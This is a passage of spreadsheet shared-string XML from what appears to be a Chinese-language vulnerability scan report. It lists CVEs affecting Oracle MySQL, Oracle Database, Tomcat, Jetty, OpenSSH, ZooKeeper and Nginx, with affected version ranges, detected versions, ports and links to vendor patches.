https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_37183&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2017-3643)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31321&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10311)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31329&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2016-5634)</t>
  </si>
  <si>
    <t>https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-14.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-535
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-632
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-533
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-639
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-532
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-609
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-554
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-510
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-522
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-642
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-605
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-650
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_37494&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server 拒绝服务漏洞(CVE-2017-3642)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31322&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>MySQL加密问题漏洞(CVE-2021-22897)</t>
  </si>
  <si>
    <t>MySQL &lt;= 5.7.348.0.0 &lt;= MySQL &lt;= 8.0.25</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2021-22897</t>
  </si>
  <si>
    <t>Oracle MySQL 输入验证错误漏洞(CVE-2022-21417)</t>
  </si>
  <si>
    <t>Oracle MySQL 输入验证错误漏洞(CVE-2022-21444)</t>
  </si>
  <si>
    <t>Oracle MySQL 输入验证错误漏洞(CVE-2022-21515)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://www.oracle.com/security-alerts/cpujul2022.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2022-37434)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到 8.0.31版本(含),5.0版本(含)到 5.7.41版本(含)</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2023-21963)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到 8.0.31版本(含),5.0版本(含)到 5.7.40版本(含)</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21963</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2023-22026)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2024-20968)</t>
  </si>
  <si>
    <t>影响mysql:8.0.34以下版本(含),8.1.0版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞,补丁获取链接：https://www.oracle.com/security-alerts/cpujan2024.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2024.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2017-10282)</t>
  </si>
  <si>
    <t>影响oracle:12.1.0.2版本,12.2.0.1版本</t>
  </si>
  <si>
    <t>Oracle Database Server FasterXML jackson-databind 组件安全漏洞(CVE-2017-15095)</t>
  </si>
  <si>
    <t>ips-11021168, ips-11024483, ips-11024484, ips-11024485（有效）</t>
  </si>
  <si>
    <t>影响oracle:12.2.0.1版本,18.1.0.0版本</t>
  </si>
  <si>
    <t>厂商补丁：目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/FasterXML/jackson-databind/issues/1737https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2018verbose.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2018-2875)</t>
  </si>
  <si>
    <t>Oracle Database Server Workload Manager 组件安全漏洞 (CVE-2019-10072)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2019-2444)</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件远程安全漏洞(CVE-2019-2776)</t>
  </si>
  <si>
    <t>影响oracle:12.1.0.2版本,12.2.0.1版本,18.0.0.0版本(含)到20.0.0.0版本</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2019verbose.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2776
http://www.oracle.com/index.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2019-2939)</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2019-2956)</t>
  </si>
  <si>
    <t>影响oracle:18.0.0.0版本(含)到20.0.0.0版本12.1.0.2版本,12.2.0.1版本</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2020-13935)</t>
  </si>
  <si>
    <t>ips-11021073（有效）</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2020-2511)</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2020-2516)</t>
  </si>
  <si>
    <t>Oracle Database Server Oracle Applications DBA组件安全漏洞(CVE-2020-2568)</t>
  </si>
  <si>
    <t>Oracle Database Server Workload Manager 组件安全漏洞 (CVE-2019-0221)</t>
  </si>
  <si>
    <t>Oracle Database Server WLM组件安全漏洞 (CVE-2019-12418)</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2019-2734)</t>
  </si>
  <si>
    <t>Oracle Database Server 信息泄露漏洞(CVE-2019-3740)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpuapr2021.html</t>
  </si>
  <si>
    <t>Oracle Database Server Workload Manager 组件安全漏洞 (CVE-2019-0199)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2019-17569)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2019-2406)</t>
  </si>
  <si>
    <t>影响oracle:12.1.0.2版本,12.2.0.1版本,18.0.0.0版本(含)到19.0.0.0版本</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2019-2913)</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2019-2940)</t>
  </si>
  <si>
    <t>Oracle Database Server RDBMS/Optimizer组件安全漏洞(CVE-2020-2734)</t>
  </si>
  <si>
    <t>影响oracle:12.2.0.1版本,12.1.0.2版本,18.0.0.0版本(含)到20.0.0.0版本</t>
  </si>
  <si>
    <t>Oracle Database Server 缓冲区溢出漏洞(CVE-2020-5360)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2021-2173)</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM component 安全漏洞(CVE-2021-2234)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2021.html</t>
  </si>
  <si>
    <t>Oracle Database Server 访问控制错误漏洞(CVE-2021-2000)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpujan2021.html</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2021-2045)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2021-2207)</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2020-2527)</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2020-2731)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2020-2978)</t>
  </si>
  <si>
    <t>Oracle Database Server 授权问题漏洞(CVE-2021-1993)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2021verbose.html</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2021-2035)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2021-2054)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2021-2175)</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS 安全漏洞(CVE-2019-2517)</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-2329)</t>
  </si>
  <si>
    <t>影响oracle:12.1.0.2版本, 12.2.0.1版本,19.0.0.0版本(含)到20版本</t>
  </si>
  <si>
    <t>厂商补丁:https://www.oracle.com/</t>
  </si>
  <si>
    <t>https://www.oracle.com//security-alerts/cpujul2021.html</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-2333)</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞（CVE-2021-2336）</t>
  </si>
  <si>
    <t>厂商补丁:https://www.oracle.com/security-alerts/cpujul2021.html</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-2337)</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-35551)</t>
  </si>
  <si>
    <t>影响Oracle:12.2.0.1版本,19c版本,21c版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2021.html</t>
  </si>
  <si>
    <t>链接：https://www.oracle.com/security-alerts/cpuoct2021.html</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-35619)</t>
  </si>
  <si>
    <t>影响Oracle:12.1.0.2版本,12.2.0.1版本,19c版本,21c版本</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS 安全漏洞(CVE-2019-2582)</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-2326)</t>
  </si>
  <si>
    <t>影响oracle:12.2.0.1版本,19.0.0.0版本(含)到20版本</t>
  </si>
  <si>
    <t>Oracle Database Server输入验证错误漏洞（CVE-2021-23280）</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-35576)</t>
  </si>
  <si>
    <t>影响Oracle:12.1.0.2版本,12.2.0.1版本,19c版本</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2022-21393)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpujan2022.html</t>
  </si>
  <si>
    <t>链接：https://www.oracle.com/security-alerts/cpujan2022.html</t>
  </si>
  <si>
    <t>Oracle Database Server资源管理错误漏洞(CVE-2019-17545)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2021.html</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞（CVE-2021-2334）</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-2335)</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-2351)</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞（CVE-2021-2438）</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-2332)</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-35557)</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2021-35558)</t>
  </si>
  <si>
    <t>Oracle Database Server 输入验证错误漏洞(CVE-2022-21247)</t>
  </si>
  <si>
    <t>影响Oracle:12.2.0.1版本,19c版本</t>
  </si>
  <si>
    <t>mysql: 5.6.51</t>
  </si>
  <si>
    <t>OpenSSH: 8.0</t>
  </si>
  <si>
    <t>Apache Tomcat 输入验证错误漏洞(CVE-2023-41080)</t>
  </si>
  <si>
    <t>8080</t>
  </si>
  <si>
    <t>Tomcat: 9.0.74</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.0版本(含)到8.5.92版本(含),9.0.0版本(含)到9.0.79版本(含),10.1.0版本(含)到10.1.12版本(含),11.0.0-M1版本(含)到11.0.0-M10版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f</t>
  </si>
  <si>
    <t>Apache Tomcat 安全漏洞(CVE-2024-23672)</t>
  </si>
  <si>
    <t>影响tomcat:8.5.0版本(含)到8.5.98版本(含),9.0.0.M1版本(含)到9.0.85版本(含),10.1.0.M1版本(含)到10.1.18版本(含),11.0.0.M1版本(含)到11.0.0.M16版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://lists.apache.org/thread/cmpswfx6tj4s7x0nxxosvfqs11lvdx2f</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2024-23672</t>
  </si>
  <si>
    <t>Apache Tomcat 安全漏洞(CVE-2023-42794)</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.85版本(含)到8.5.94版本,9.0.70版本(含)到9.0.81版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://lists.apache.org/thread/vvbr2ms7lockj1hlhz5q3wmxb2mwcw82</t>
  </si>
  <si>
    <t>Apache Tomcat 安全漏洞(CVE-2023-42795)</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.85版本(含)到8.5.94版本,9.0.1版本(含)到9.0.81版本,10.1.1版本(含)到10.1.14版本,11.0.0-M1版本(含)到11.0.0-M11版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://lists.apache.org/thread/065jfyo583490r9j2v73nhpyxdob56lw</t>
  </si>
  <si>
    <t>Apache Tomcat 输入验证错误漏洞(CVE-2023-46589)</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.0版本(含)到8.5.95版本(含),9.0.1版本(含)到9.0.82版本(含),10.1.1版本(含)到10.1.15版本(含),11.0.0-M1版本(含)到11.0.0-M10版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr</t>
  </si>
  <si>
    <t>Apache Tomcat 输入验证错误漏洞(CVE-2024-24549)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://lists.apache.org/thread/4c50rmomhbbsdgfjsgwlb51xdwfjdcvg</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2024-24549</t>
  </si>
  <si>
    <t>Eclipse Jetty拒绝服务漏洞（CVE-2020-27223）</t>
  </si>
  <si>
    <t>8887</t>
  </si>
  <si>
    <t>jetty: 9.4.24</t>
  </si>
  <si>
    <t>影响Jetty:9.4.6.v2017053版本(含)到9.4.36.v20210114版本(含),10.0版本,11.0版本</t>
  </si>
  <si>
    <t xml:space="preserve">厂商补丁: Eclipse ------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：  https://bugs.eclipse.org/bugs/show_bug.cgi?id=571128 </t>
  </si>
  <si>
    <t>Eclipse Jetty 安全漏洞(CVE-2022-2048)</t>
  </si>
  <si>
    <t>影响Jetty:9.4.47以下版本,10.0.0版本(含)到10.0.9版本,11.0.0版本(含)到11.0.9版本</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://github.com/eclipse/jetty.project/security/advisories/GHSA-wgmr-mf83-7x4j</t>
  </si>
  <si>
    <t>Eclipse Jetty 安全漏洞(CVE-2023-40167)</t>
  </si>
  <si>
    <t>影响Jetty:9.4.21版本(含)到9.4.51版本(含),10.0.0版本(含)到10.0.15版本(含),11.0.0版本(含)到11.0.15版本(含),12.0.0版本</t>
  </si>
  <si>
    <t>厂商已经发布更新版本，建议参考如下链接进行修复https://github.com/eclipse/jetty.project/security/advisories/GHSA-hmr7-m48g-48f6</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2023-40167</t>
  </si>
  <si>
    <t>OpenSSH 输入验证错误漏洞(CVE-2019-16905)</t>
  </si>
  <si>
    <t>影响OpenSSH:7.7版本(含)到7.9版本(含),8.0版本(含)到8.1版本</t>
  </si>
  <si>
    <t>参见《OpenSSH 输入验证错误漏洞(CVE-2019-16905)-修复方案》</t>
  </si>
  <si>
    <t>https://www.openssh.com/releasenotes.html</t>
  </si>
  <si>
    <t>Apache Tomcat 安全漏洞(CVE-2023-34981)</t>
  </si>
  <si>
    <t>影响tomcat:11.0.0-M5版本,10.1.8版本,9.0.74版本,8.5.88版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接https://lists.apache.org/thread/j1ksjh9m9gx1q60rtk1sbzmxhvj5h5qz</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34981</t>
  </si>
  <si>
    <t>Apache Tomcat 输入验证错误漏洞(CVE-2023-45648)</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.85版本(含)到8.5.94版本,9.0.1版本(含)到9.0.81版本,10.1.1版本(含)到10.1.14版本,11.0.0-M1版本(含)到11.0.0-M10版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://lists.apache.org/thread/2pv8yz1pyp088tsxfb7ogltk9msk0jdp</t>
  </si>
  <si>
    <t>Jetty 敏感文件下载漏洞(CVE-2021-28169)</t>
  </si>
  <si>
    <t>ips-11021574（有效）</t>
  </si>
  <si>
    <t>9.0.0≤Jetty≤9.4.4010.0.0≤Jetty≤10.0.211.0.0≤Jetty≤11.0.2</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq</t>
  </si>
  <si>
    <t>https://github.com/eclipse/jetty.project
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2021_20509&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Eclipse Jetty 安全漏洞(CVE-2020-27216)</t>
  </si>
  <si>
    <t>影响Jetty:1.0版本(含)到9.3.29版本,9.4.0版本(含)到9.4.32版本(含),10.0版本(含)到10.0.0.beta2版本(含),11.0版本(含)到11.0.0.beta2版本(含)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6#advisory-comment-63053</t>
  </si>
  <si>
    <t>Eclipse Jetty 安全漏洞(CVE-2022-2047)</t>
  </si>
  <si>
    <t>影响Jetty:9.4.46以下版本,10.0.0版本(含)到10.0.9版本,11.0.0版本(含)到11.0.9版本(含)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q</t>
  </si>
  <si>
    <t>Eclipse Jetty 安全漏洞(CVE-2023-41900)</t>
  </si>
  <si>
    <t>影响Jetty:9.4.21版本(含)到9.4.51版本(含),10.0.0版本(含)到10.0.15版本(含),11.0.0版本(含)到11.0.15版本(含)</t>
  </si>
  <si>
    <t>厂商已经发布更新版本，建议参考如下链接进行修复https://github.com/eclipse/jetty.project/security/advisories/GHSA-pwh8-58vv-vw48</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2023-41900</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20962)</t>
  </si>
  <si>
    <t>mysql: 8.0.35</t>
  </si>
  <si>
    <t>影响mysql:8.0.35以下版本(含),8.2.0以下版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20978)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.35版本(含),8.1.0版本(含)到8.2.0版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpujan2024.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20973)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpujan2024.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20969)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20967)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20964)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20974)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20976)</t>
  </si>
  <si>
    <t>Oracle MySQL Cluster 安全漏洞(CVE-2024-20965)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到 8.0.35版本(含),8.2.0版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页https://www.oracle.com/security-alerts/cpujan2024.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21062)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到 8.0.36版本(含),8.3.0版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://www.oracle.com/security-alerts/cpuapr2024.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21096)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21008)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21000)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21009)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21060)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21047)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21069)</t>
  </si>
  <si>
    <t>Eclipse Jetty 安全漏洞(CVE-2024-22201)</t>
  </si>
  <si>
    <t>影响jetty:9.0版本(含)到9.4.53版本(含),10.0版本(含)到10.0.19版本(含),11.0版本(含)到11.0.19版本(含),12.0版本(含)到12.0.5版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://github.com/jetty/jetty.project/security/advisories/GHSA-rggv-cv7r-mw98</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2024-22201</t>
  </si>
  <si>
    <t>Apache ZooKeeper 信息泄露漏洞(CVE-2024-23944)</t>
  </si>
  <si>
    <t>2181</t>
  </si>
  <si>
    <t>zookeeper: 3.6.2</t>
  </si>
  <si>
    <t>影响zookeeper:3.6.0版本(含)到3.7.2版本(含),3.8.0版本(含)到3.8.3版本(含),3.9.0版本(含)到3.9.1版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://lists.apache.org/thread/96s5nqssj03rznz9hv58txdb2k1lr79k</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2024-23944</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20975)</t>
  </si>
  <si>
    <t>影响mysql:8.1.0版本(含)到8.2.0版本(含),8.0.35以下版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20982)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞,补丁获取链接：https://www.oracle.com/security-alerts/cpujan2024.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20972)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20985)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20984)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20970)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20961)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21102)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20998)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21054)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21087)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21055)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到 8.0.35版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21057)</t>
  </si>
  <si>
    <t>Nginx 安全漏洞(CVE-2021-23017)</t>
  </si>
  <si>
    <t>8081</t>
  </si>
  <si>
    <t>nginx: 1.19.9</t>
  </si>
  <si>
    <t>影响nginx:0.6.18版本(含)到1.20.1版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
  </si>
  <si>
    <t>https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
  </si>
  <si>
    <t>Eclipse Jetty 资源管理错误漏洞（CVE-2021-28165)</t>
  </si>
  <si>
    <t>7.2.2 &lt;= Jetty &lt; 9.4.3910.0.0 &lt;= Jetty &lt; 10.0.211.0.0 &lt;= Jetty &lt; 11.0.2</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/eclipse/jetty.project/security/advisories/GHSA-26vr-8j45-3r4w</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2021-28165</t>
  </si>
  <si>
    <t>Eclipse Jetty 资源管理错误漏洞（CVE-2020-27223）</t>
  </si>
  <si>
    <t>Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0 存在资源管理错误漏洞，该漏洞源于处理这些质量值的CPU使用率过高，服务器可能会进入拒绝服务（DoS）状态，</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.eclipse.org/bugs/show_bug.cgi?id=571128</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2020-27223</t>
  </si>
  <si>
    <t>Eclipse Jetty信息泄露漏洞（CVE-2020-27218）</t>
  </si>
  <si>
    <t>影响Jetty:9.4.0版本(含)到9.4.35版本,10.0版本(含)到10.0.0.beta2版本(含),11.0版本(含)到11.0.0.beta2版本(含)</t>
  </si>
  <si>
    <t xml:space="preserve">厂商补丁: Eclipse ------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：  https://bugs.eclipse.org/bugs/show_bug.cgi?id=568892 </t>
  </si>
  <si>
    <t>Eclipse Jetty信息泄露漏洞（CVE-2021-34428）</t>
  </si>
  <si>
    <t>影响Jetty:9.4.40以下版本(含),10.0.0版本(含)到10.0.2版本(含),11.0.0版本(含)到11.0.2版本(含)</t>
  </si>
  <si>
    <t xml:space="preserve">厂商补丁: Eclipse ------- 目前厂商已经发布了升级补丁以修复这个安全问题，补丁获取链接：  https://lists.apache.org/thread.html/ref1c161a1621504e673f9197b49e6efe5a33ce3f0e6d8f1f804fc695@%3Cjira.kafka.apache.org%3E </t>
  </si>
  <si>
    <t>Eclipse Jetty 信息泄露漏洞(CVE-2023-26049)</t>
  </si>
  <si>
    <t>影响Jetty:9.4.51以下版本,10.0.0版本(含)到10.0.14版本,11.0.0版本(含)到11.0.14版本</t>
  </si>
  <si>
